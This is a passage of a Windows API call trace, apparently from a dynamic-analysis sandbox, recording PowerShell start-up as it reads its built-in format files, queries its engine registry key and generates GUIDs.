	[0545.287] ReadFile (in: hFile=0x31c, lpBuffer=0x35322d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35322d8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0545.288] ReadFile (in: hFile=0x31c, lpBuffer=0x35322d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35322d8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0545.288] ReadFile (in: hFile=0x31c, lpBuffer=0x35322d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35322d8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0545.288] ReadFile (in: hFile=0x31c, lpBuffer=0x35322d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35322d8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0545.288] ReadFile (in: hFile=0x31c, lpBuffer=0x35322d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35322d8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0545.288] ReadFile (in: hFile=0x31c, lpBuffer=0x35322d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35322d8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0545.288] ReadFile (in: hFile=0x31c, lpBuffer=0x35322d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35322d8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0545.289] ReadFile (in: hFile=0x31c, lpBuffer=0x35322d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35322d8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0545.291] ReadFile (in: hFile=0x31c, lpBuffer=0x35322d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35322d8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0545.291] ReadFile (in: hFile=0x31c, lpBuffer=0x35322d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35322d8*, lpNumberOfBytesRead=0x24d0b8*=0xbce, lpOverlapped=0x0) returned 1
	[0545.291] ReadFile (in: hFile=0x31c, lpBuffer=0x3531a0e, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3531a0e*, lpNumberOfBytesRead=0x24d0b8*=0x0, lpOverlapped=0x0) returned 1
	[0545.291] ReadFile (in: hFile=0x31c, lpBuffer=0x35322d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35322d8*, lpNumberOfBytesRead=0x24d0b8*=0x0, lpOverlapped=0x0) returned 1
	[0545.291] CloseHandle (hObject=0x31c) returned 1
	[0545.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0545.292] SetErrorMode (uMode=0x1) returned 0x1
	[0545.292] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d060 | out: lpFileInformation=0x24d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0545.292] SetErrorMode (uMode=0x1) returned 0x1
	[0545.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0545.292] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d148 | out: phkResult=0x24d148*=0x31c) returned 0x0
	[0545.292] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d0cc, lpData=0x0, lpcbData=0x24d0c8*=0x0 | out: lpType=0x24d0cc*=0x1, lpData=0x0, lpcbData=0x24d0c8*=0x56) returned 0x0
	[0545.292] CoTaskMemAlloc (cb=0x5a) returned 0x19a370
	[0545.293] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d09c, lpData=0x19a370, lpcbData=0x24d098*=0x56 | out: lpType=0x24d09c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d098*=0x56) returned 0x0
	[0545.293] CoTaskMemFree (pv=0x19a370) 
	[0545.293] RegCloseKey (hKey=0x31c) returned 0x0
	[0545.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0545.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0545.294] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xada0a3fc, Data2=0x979d, Data3=0x4ede, Data4=([0]=0x9a, [1]=0xd3, [2]=0x67, [3]=0x32, [4]=0xf1, [5]=0x32, [6]=0x24, [7]=0x6))) returned 0x0
	[0545.294] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x24228ea8, Data2=0x9a29, Data3=0x45ee, Data4=([0]=0x91, [1]=0x46, [2]=0x69, [3]=0xa2, [4]=0xb9, [5]=0xa1, [6]=0x3b, [7]=0x85))) returned 0x0
	[0545.295] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xdda72d7c, Data2=0x9d0e, Data3=0x48d5, Data4=([0]=0x9e, [1]=0xd5, [2]=0xa4, [3]=0x84, [4]=0x1c, [5]=0x11, [6]=0x51, [7]=0x7c))) returned 0x0
	[0545.295] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x3c999e5e, Data2=0x50e8, Data3=0x479e, Data4=([0]=0x91, [1]=0xc0, [2]=0x9a, [3]=0xc1, [4]=0x1f, [5]=0x5c, [6]=0x7f, [7]=0x73))) returned 0x0
	[0545.295] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x587b85fe, Data2=0xdd3e, Data3=0x42d7, Data4=([0]=0x92, [1]=0x5a, [2]=0x3f, [3]=0x2e, [4]=0x94, [5]=0x61, [6]=0x42, [7]=0x7a))) returned 0x0
	[0545.295] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xd57b5404, Data2=0x3ca2, Data3=0x404a, Data4=([0]=0xbf, [1]=0xbd, [2]=0xa1, [3]=0xd, [4]=0xbd, [5]=0x21, [6]=0xa9, [7]=0xef))) returned 0x0
	[0545.295] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xfcae7915, Data2=0xcb52, Data3=0x4d55, Data4=([0]=0xbb, [1]=0xb5, [2]=0x4d, [3]=0xf8, [4]=0xd6, [5]=0xcc, [6]=0x5d, [7]=0x19))) returned 0x0
	[0545.295] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x38d5ff4f, Data2=0x4e04, Data3=0x4809, Data4=([0]=0x9a, [1]=0x9c, [2]=0xcd, [3]=0x51, [4]=0xa, [5]=0x95, [6]=0xd4, [7]=0xef))) returned 0x0
	[0545.296] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x14e265ba, Data2=0xb82d, Data3=0x4e23, Data4=([0]=0x97, [1]=0xf7, [2]=0xbf, [3]=0x69, [4]=0x8c, [5]=0x51, [6]=0x4b, [7]=0x1d))) returned 0x0
	[0545.296] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xc62333b2, Data2=0x6bee, Data3=0x4e09, Data4=([0]=0xad, [1]=0x57, [2]=0xe1, [3]=0x72, [4]=0xec, [5]=0x1d, [6]=0xd5, [7]=0x86))) returned 0x0
	[0545.296] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x80d9d2ec, Data2=0x1d29, Data3=0x4ec5, Data4=([0]=0x9d, [1]=0x43, [2]=0x6e, [3]=0xf0, [4]=0xbe, [5]=0x20, [6]=0xb0, [7]=0x25))) returned 0x0
	[0545.296] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x4eb6808d, Data2=0xd2fb, Data3=0x45ce, Data4=([0]=0xaa, [1]=0x33, [2]=0xa4, [3]=0xa8, [4]=0x52, [5]=0xf7, [6]=0x1d, [7]=0x3d))) returned 0x0
	[0545.296] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xf306d59a, Data2=0x7f1e, Data3=0x4eab, Data4=([0]=0x83, [1]=0xc5, [2]=0x91, [3]=0x96, [4]=0x3, [5]=0xac, [6]=0x11, [7]=0x2))) returned 0x0
	[0545.297] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x76eb3f4c, Data2=0x7a75, Data3=0x4c28, Data4=([0]=0x8a, [1]=0xd, [2]=0x55, [3]=0x3e, [4]=0xe0, [5]=0x74, [6]=0xde, [7]=0x56))) returned 0x0
	[0545.297] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x5578db9, Data2=0x9826, Data3=0x4eb3, Data4=([0]=0x85, [1]=0xed, [2]=0x75, [3]=0x45, [4]=0xd, [5]=0xc6, [6]=0x61, [7]=0xff))) returned 0x0
	[0545.297] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x19bc5dad, Data2=0x9d36, Data3=0x4e01, Data4=([0]=0xad, [1]=0xeb, [2]=0x29, [3]=0x42, [4]=0x66, [5]=0x3a, [6]=0x7d, [7]=0xda))) returned 0x0
	[0545.297] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xb01cec13, Data2=0xd50e, Data3=0x47ee, Data4=([0]=0xb2, [1]=0x8d, [2]=0x9f, [3]=0x43, [4]=0x21, [5]=0x9b, [6]=0xa7, [7]=0xce))) returned 0x0
	[0545.297] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x35426bba, Data2=0xd4c, Data3=0x457b, Data4=([0]=0x81, [1]=0x7, [2]=0xbb, [3]=0x20, [4]=0x4a, [5]=0xe2, [6]=0x25, [7]=0xef))) returned 0x0
	[0545.297] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x4ea0757f, Data2=0x9aaf, Data3=0x4efb, Data4=([0]=0x8c, [1]=0x81, [2]=0xa6, [3]=0xfa, [4]=0x76, [5]=0x4e, [6]=0x23, [7]=0x5))) returned 0x0
	[0545.297] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xcaa5c2ba, Data2=0xe1a, Data3=0x4b8a, Data4=([0]=0x87, [1]=0x4c, [2]=0x82, [3]=0x96, [4]=0x30, [5]=0x8a, [6]=0x67, [7]=0x92))) returned 0x0
	[0545.298] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xd9f425f1, Data2=0x6c88, Data3=0x46a6, Data4=([0]=0x95, [1]=0x3, [2]=0xb7, [3]=0x71, [4]=0x75, [5]=0xe5, [6]=0x4d, [7]=0x29))) returned 0x0
	[0545.298] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x3d892f79, Data2=0xaa8b, Data3=0x4684, Data4=([0]=0xb1, [1]=0x7d, [2]=0x3c, [3]=0xa2, [4]=0xd, [5]=0x2d, [6]=0x69, [7]=0xa3))) returned 0x0
	[0545.298] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x6d4041c9, Data2=0x786c, Data3=0x431e, Data4=([0]=0xaf, [1]=0xaa, [2]=0x4c, [3]=0x9b, [4]=0xe8, [5]=0x40, [6]=0xc, [7]=0x1))) returned 0x0
	[0545.298] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xc48e9f67, Data2=0x339f, Data3=0x4782, Data4=([0]=0xa3, [1]=0xcf, [2]=0xc6, [3]=0x19, [4]=0x56, [5]=0xd8, [6]=0xe9, [7]=0xe2))) returned 0x0
	[0545.298] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x27149cf1, Data2=0x498c, Data3=0x40b7, Data4=([0]=0xad, [1]=0x68, [2]=0x9f, [3]=0x50, [4]=0xa9, [5]=0x7e, [6]=0x83, [7]=0xba))) returned 0x0
	[0545.298] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xce66f753, Data2=0x2e8a, Data3=0x4049, Data4=([0]=0x8a, [1]=0x48, [2]=0x81, [3]=0x2d, [4]=0x3f, [5]=0xa2, [6]=0x8f, [7]=0x78))) returned 0x0
	[0545.298] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xd8315b00, Data2=0xe517, Data3=0x4f5b, Data4=([0]=0xb4, [1]=0xc, [2]=0xff, [3]=0xd4, [4]=0x1e, [5]=0xe0, [6]=0x1f, [7]=0x25))) returned 0x0
	[0545.299] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xf54e929c, Data2=0xb0a3, Data3=0x4750, Data4=([0]=0x99, [1]=0x2f, [2]=0xa2, [3]=0x42, [4]=0x26, [5]=0x5a, [6]=0x77, [7]=0x17))) returned 0x0
	[0545.299] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x83161130, Data2=0xe454, Data3=0x40f4, Data4=([0]=0x96, [1]=0xa9, [2]=0x79, [3]=0x6e, [4]=0xf1, [5]=0xd3, [6]=0xfd, [7]=0x17))) returned 0x0
	[0545.299] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x5b1ef082, Data2=0x5c17, Data3=0x4c7b, Data4=([0]=0xb9, [1]=0x96, [2]=0x48, [3]=0x4c, [4]=0x10, [5]=0x16, [6]=0x98, [7]=0x17))) returned 0x0
	[0545.299] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x8840d7ad, Data2=0xfd9d, Data3=0x4ce3, Data4=([0]=0xa3, [1]=0x58, [2]=0x44, [3]=0x9d, [4]=0xf0, [5]=0x59, [6]=0x35, [7]=0x66))) returned 0x0
	[0545.299] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x6307e228, Data2=0x7487, Data3=0x4e9a, Data4=([0]=0xb3, [1]=0xc, [2]=0x86, [3]=0x14, [4]=0x53, [5]=0x4a, [6]=0x82, [7]=0x5e))) returned 0x0
	[0545.299] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xc963e47e, Data2=0x394b, Data3=0x4f7f, Data4=([0]=0xb3, [1]=0x35, [2]=0xef, [3]=0xbe, [4]=0x1a, [5]=0xc, [6]=0xc0, [7]=0xa3))) returned 0x0
	[0545.299] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x756e46b7, Data2=0xe685, Data3=0x40ff, Data4=([0]=0x88, [1]=0x66, [2]=0x58, [3]=0xb0, [4]=0x5b, [5]=0xd8, [6]=0xaa, [7]=0x2))) returned 0x0
	[0545.299] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x6b203327, Data2=0xc372, Data3=0x46b7, Data4=([0]=0x9c, [1]=0xb7, [2]=0x30, [3]=0xec, [4]=0x5e, [5]=0x8e, [6]=0xa0, [7]=0x30))) returned 0x0
	[0545.300] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x52ecb934, Data2=0xdd75, Data3=0x4558, Data4=([0]=0xb3, [1]=0x1b, [2]=0x5e, [3]=0x83, [4]=0xea, [5]=0x3b, [6]=0x38, [7]=0xf2))) returned 0x0
	[0545.300] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x7cb0117, Data2=0x9148, Data3=0x4c0d, Data4=([0]=0xaa, [1]=0x5c, [2]=0x53, [3]=0x15, [4]=0x55, [5]=0x33, [6]=0x7f, [7]=0x29))) returned 0x0
	[0545.300] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c
	[0545.301] GetFileType (hFile=0x31c) returned 0x1
	[0545.301] SetErrorMode (uMode=0x1) returned 0x1
	[0545.301] GetFileType (hFile=0x31c) returned 0x1
	[0546.237] ReadFile (in: hFile=0x31c, lpBuffer=0x3642f00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3642f00*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.238] ReadFile (in: hFile=0x31c, lpBuffer=0x3642f00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3642f00*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.238] ReadFile (in: hFile=0x31c, lpBuffer=0x3642f00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3642f00*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.238] ReadFile (in: hFile=0x31c, lpBuffer=0x3642f00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3642f00*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.239] ReadFile (in: hFile=0x31c, lpBuffer=0x3642f00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3642f00*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.239] ReadFile (in: hFile=0x31c, lpBuffer=0x3642f00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3642f00*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.239] ReadFile (in: hFile=0x31c, lpBuffer=0x3642f00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3642f00*, lpNumberOfBytesRead=0x24d0b8*=0x119, lpOverlapped=0x0) returned 1
	[0546.239] ReadFile (in: hFile=0x31c, lpBuffer=0x3642f00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3642f00*, lpNumberOfBytesRead=0x24d0b8*=0x0, lpOverlapped=0x0) returned 1
	[0546.239] CloseHandle (hObject=0x31c) returned 1
	[0546.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0546.240] SetErrorMode (uMode=0x1) returned 0x1
	[0546.240] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d060 | out: lpFileInformation=0x24d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0546.240] SetErrorMode (uMode=0x1) returned 0x1
	[0546.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0546.240] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d148 | out: phkResult=0x24d148*=0x31c) returned 0x0
	[0546.240] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d0cc, lpData=0x0, lpcbData=0x24d0c8*=0x0 | out: lpType=0x24d0cc*=0x1, lpData=0x0, lpcbData=0x24d0c8*=0x56) returned 0x0
	[0546.240] CoTaskMemAlloc (cb=0x5a) returned 0x19a370
	[0546.240] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d09c, lpData=0x19a370, lpcbData=0x24d098*=0x56 | out: lpType=0x24d09c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d098*=0x56) returned 0x0
	[0546.241] CoTaskMemFree (pv=0x19a370) 
	[0546.241] RegCloseKey (hKey=0x31c) returned 0x0
	[0546.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0546.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0546.242] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xf14b20e5, Data2=0x22df, Data3=0x4db2, Data4=([0]=0x96, [1]=0x5c, [2]=0x45, [3]=0x51, [4]=0x1b, [5]=0x11, [6]=0x37, [7]=0xe))) returned 0x0
	[0546.242] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xcebb0170, Data2=0x9e87, Data3=0x445d, Data4=([0]=0xa9, [1]=0xe2, [2]=0x54, [3]=0xa7, [4]=0x2e, [5]=0xdf, [6]=0xe1, [7]=0x7))) returned 0x0
	[0546.242] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xfa9e938a, Data2=0xa37, Data3=0x424f, Data4=([0]=0xa8, [1]=0xd7, [2]=0x1d, [3]=0xfd, [4]=0xc0, [5]=0x56, [6]=0x5b, [7]=0xc7))) returned 0x0
	[0546.242] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xeedb370c, Data2=0xb33f, Data3=0x4131, Data4=([0]=0x96, [1]=0xde, [2]=0xbf, [3]=0x88, [4]=0xdb, [5]=0xf4, [6]=0x61, [7]=0xe5))) returned 0x0
	[0546.242] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c
	[0546.243] GetFileType (hFile=0x31c) returned 0x1
	[0546.243] SetErrorMode (uMode=0x1) returned 0x1
	[0546.243] GetFileType (hFile=0x31c) returned 0x1
	[0546.243] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.244] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.244] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.244] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.244] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.244] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.244] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.245] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.246] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.246] ReadFile (in: hFile=0x31c, lpBuffer=0x369f0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x369f0a0*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
